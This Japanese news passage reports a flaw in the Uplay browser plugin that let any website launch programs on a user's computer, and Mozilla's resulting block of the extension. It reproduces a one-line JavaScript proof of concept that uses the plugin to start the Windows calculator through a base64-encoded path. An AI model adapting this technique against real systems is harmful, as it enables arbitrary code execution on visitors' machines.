そのため、この拡張機能を使用して特別なコードを使用すると、任意のサイトからユーザーのシステムにアクセスできます。
デモ(例として、コンピューターで電卓プログラムを起動します) 。
コード:
var x = document.createElement('OBJECT'); x.setAttribute("type", "application/x-uplaypc"); document.body.appendChild(x); x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Ubisoftは、バックドアがシステムに特別に組み込まれていないことを保証しますが、これはコードの誤りです。 彼らはすでにUplayの更新バージョンをリリースしており、公式ウェブサイトからダウンロードできます。
しかし、プログラムは自動的に更新されず、数百万台のコンピューターにインストールされます;多くの場合、セキュリティ上のリスクは残ります。 そのため、Mozillaは本日、すべてのユーザーに対してUplay拡張機能を完全にブロックすることを決定しました 。